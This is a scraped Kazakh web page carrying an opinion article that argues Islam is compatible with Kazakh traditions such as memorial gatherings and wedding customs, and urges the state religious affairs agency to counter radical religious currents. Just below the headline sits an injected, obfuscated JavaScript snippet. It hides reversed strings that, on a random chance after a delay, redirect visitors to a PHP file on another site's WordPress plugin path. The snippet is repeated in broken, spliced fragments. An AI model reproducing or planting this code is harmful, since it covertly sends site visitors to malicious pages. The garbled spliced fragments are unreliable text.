Ислам салт-дәстүрге қарсы емес

$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to; display: block;» title=»1-islam» src=»http://nurastana.kz/wp-content/uploads/2011/10/1-islam.jpg» alt=»alt» height=»149″ width=»200″ />

Тоқсаныншы жылдары еліміз өзін зайырлы мемлекет ретінде жариялағаннан-ақ түрлі бағыттағы діни ағымдар өз ұстанымдарын еркін уағыздай бастады. Әсіресе «Иегова куәгерлері», «Хизбут Тахрир», «Таблиғи жамағат», баптистер, кришнайттер, уаххабшылдар, салафиттер ерекше белсенділік танытты. Олардың ішінде «саяси исламшыл» топтар да жоқ емес.

Мұндай ағымдар елдегі ислам дінін ұстанушы азаматтардың арасында пікір алуандығы мен өзара алауыздықтың тууына әкеліп соқтырды. Алғашқы жылдары берілген еркіндік бізді діни ахуалдың себебімен емес, нәтижесімен күресуге мәжбүрлеп келеді. Осыған орай үстіміздегі жылдың ортасында елімізде Дін істері жөніндегі агенттігі құрылды. Аталмыш агенттік елде «дәстүрлі исламды» дамыту тұжырымдамасын жасап, «байсалды исламды» орнықтыруды қолға ала бастады.
«Дәстүрлі ислам» түсінігіне байланысты қоғамда түрлі пікірлер пайда болуда. Осыған орай аталмыш ұғымды талдап көрсек.
Әлемдегі барша мұсылмандар ардақ тұтатын қасиетті Құранда Алла тағала: «Мен адамдарды бірін-бірі тануы үшін ұлттарға бөліп жараттым», дейді. Демек, Алланың тікелей пәрменімен жер бетіндегі адамзаттың ұлтқа бөліну үдерісі жүзеге асқан. Ал ұлт сөзінің атрибутына келер болсақ оның өзіндік параметрлері бар. Мәселен, бір ұлт екінші бір ұлттан дербес тілі, дәстүрі мен мәдениетінің болуымен ерекшеленеді. Ал Мұхаммед Пайғамбар (с.ғ.с.) егер кез келген ұлттың өзіндік дәстүрі мен ғұрыптары Құран мен хадистерге қайшы келмейтін болса, онда оны ұстануға толықтай рұқсат беріледі деген. Бұл қағида Ислам дінінің VIII ғасырдан бастап қазақ даласына ену процесі кезінде де сақталды. Түркі халықтары дәстүрінің Ислам діні қағидаларымен ұқсас болуы мен идеялар арасы қайшылығының болмауы ата-бабаларымыздың өз дәстүрін емін-еркін ұстануына негіз болды. Аталған уақыттан бүгінгі күнге дейін қазақ даласы мен Орталық Азия аймағы көптеген дін ғұламаларын туғызды. Бұл ғұламалардың тікелей ықпалымен өңірімізде Ислам діні халықтың тұрмыс-тіршілігіне дендей енді. Өзіндік салт-дәстүрін дінмен астастыра ұстанған халқымыз дінаралық түсініспеушіліктерден де алыс болды. Орталық Азия халықтары Ислам дінінің Әбу Ханифа мәзхабын ұстанып келді.
Қазіргі таңда жасыратыны жоқ Қазақстан аумағына орныққан Исламның дәстүрлі емес ағымдары сан ғасырлық ата-баба мұрасы мен қазақы салт-дәстүрді жиі-жиі мансұқ етуде. Олар ата-баба басына зиярат ету, кез келген ұлттық дәстүрлі ерекшеліктерге қарсы шығып жатыр. Оның үстіне мұны жасаушы өзіміздің қаракөздер болуы үлкен өкініш. Олар Ислам дінінде айтылмайтын, бірақ қазақы дәстүрде сақталып келген әдет-ғұрыптарды дінсіздікке балап, осы арқылы ата тарихымызға қиянат жасап отыр. Тіпті бүлікшілерге кей кездері қазақтың ежелден мұсылман болғанын дәлелдеуге тура келуде!
Қазақтың дәстүрінде тарихтан келе жатқан қайтыс болған кісінің жетісін, қырқын және жүздігін беру дәстүрлері бар. Ерте заманнан бүгінгі күнге дейін жалғасып келе жатқан бұл дәстүрді тамырын шет елдерден алып жатқан кейбір ислами ағымдар «шірікке» балап, ата-баба салтын мансұқ етуде. Дегенмен, бұл дәстүрдің діни шикілігі бар дей алмаймыз. Өйткені, Ислам діні бойынша қайтыс болған кісі үшін тірілердің жасай алатын негізгі жақсылығы марқұмның рухына бағыштап Құран оқу болып табылады. Ал жетісі, қырқы және жүздігінде марқұмның туыстары жиылып, Алладан сол кісінің тірі кезінде жасаған кемшіліктерін кешуін сұрап Құран аяттарын оқиды. Бұл дәстүрде жалпы қалың қазаққа тән ысырапшылдық орын алып жатуы мүмкін. Өйткені, қазақтың тарихы той-томалақ пен ас өткізуге толы. Бірақ мұны да діни сауатты имамдардың түсіндіруі арқылы шешуге болады. Сондықтан кейбіреулер «шірікке» теңеп мансұқтаған ата дәстүріміздің Ислам дініне кереғар келіп тұрғанын байқай алмаймыз. Тіпті, Құранда мұсылмандарға жетісі, қырқы және жүздігінде жиналмаңдар деген қағида жоқ. Мұның өзі аталған дәстүріміздің тыйым салынуға негіз жоқтығын айғақтап тұрған жоқ па? Шынын айту керек осы аталған жиындарды негізгі бағыттан қате түсініп (яғни, мақтансүйгіштік немесе жұрттан қалып кетпеу секілді) өткізушілер де жоқ емес. Бірақ имамдарымыз бен дінтанушыларымыз халыққа мұның негізгі хикметін түсіндірсе көштің жүре түзелетіні анық. Қазақтың салт-дәстүрінде радикалды дін өкілдері қырын қарайтын осы секілді көптеген ерекшеліктер бар. Бұлардың бәрін де сауатты имамдар қарапайым халыққа тұрақты жеткізер болса, елімізге де жат ағымдардың тигізер ықпалы да аз болмақ.
Ислам діні кейбір азаматтар ойлайтындай догма емес. Мәселен, бұл дін бойынша Алла тағала адамдарға халал ас жеуді бұйырған. Жеуге болмайтын харам нәрселер ашық көрсетілген. Бірақ адамдардың асты қалай дайындау қажеттігіне нұсқау берілмеген. Мәселен, қазақ халқына тән ет асу тамағы өзге мұсылман халықтарында кездесе бермейді. Сол секілді ирандықтар, түріктер мен арабтарда жасалатын кейбір тағам түрлері бізге де жат. Өйткені, бұл тағамдар әрбір халықтың ұлттық тағамдары болып табылады. Осы секілді Исламда адамдарға ұятты жерін жауып жүруді бұйырған. Бірақ қандай үлгіде киім киюді міндеттемеген. Сондықтан шетелдік мұсылман ғалымдарының кейбір уәждерін соңғы бұйрық секілді қабылдаудан аулақ болуға тиіспіз. Соңғы кездері тұрмысқа шығып, босаға аттаған кейбір қыздарымыз беташар кезінде күйеуінің ата-анасы мен ағайындарына сәлем беруді «шірікке» балап, сан ғасырлық ата-баба салтына шекесінен қарауда. Үлкендерге иіліп сәлем беруді, ол кісілерден «бірдеңе дәмету» деп түсінетін және мұны солай түсіндіретіндерді көргенде Абай атамыз айтқандай «қаныңның қайнап, жаныңның ашитыны» рас.
Кезінде Шәкәрім атамыз қазақтың ежелден ұстанып келе жатқан дініне қырын қараушыларға «шатақ діндер» деген айдар таққан. Сәйкесінше халқымыз да осындай ғалымдардың уәждеріне құлақ асып, «шатақ діндердің» таралуына мүмкіндік бермеген. Осы секілді олардың дамуына тек ұлттық иммунитет қарсы тұра алады. Сондықтан елімізде ата тарих пен ұлттық ерекшеліктерімізді жете бағалайтын азаматтардың көп болғаны қажет-ақ.
Қысқасы, елімізде құрылған Дін істері агенттігінің негізгі шарасы тек радикалды исламмен күресіп қана қоймай, қарапайым халықтың дұрыс діни сауат ашуына да мұрындық болса нұр үстіне нұр болар еді. Өйткені, мемлекетті құраушылар – елдің қарапайым азаматтары. Олардың діни сауаты жеткілікті болып, ата дәстүрді жете ұғынса, Тәуелсіз Қазақстанымыз тұрақтылық пен бейбіт дамуды ту қылып ұстаған айтулы елдердің бірі болар еді. Сонымен қатар, Дін істері агенттігі радикалды бағыттардағы ағымдарға исламның ішіндегі игілікті қағидаларымен қарсы тұра алатын білімді азаматтардың көмегіне көбірек жүгінгені жөн болар еді. Кезінде Түркия мен Иранға да радикалды исламның таралуына әрекеттенгені белгілі. Алайда, сан ғасырлық ата-баба жолына беріктік танытқан бұл елдер жат ағымдардың таралуына жол бермей тұрақтылықты сақтай алды. Мемлекеттің ұйытқы болуымен елдегі ислам ғұламалары шетелдік ағымдардың таралуына жол берместен оларды орта жолдан қайтарған екен. Бұған қарапайым халық та мүдделі болған. Аталған жайттар біздің елге де үлгі болуы тиіс екенін мойындауға тиіспіз.

Сәкен Есіркепов{jcomments on}

http://nurastana.kz/?p=3373

http://kyzmet-gazeti.kz/


Leave a Reply

Ваш адрес email не будет опубликован. Обязательные поля помечены *

Яндекс.Метрика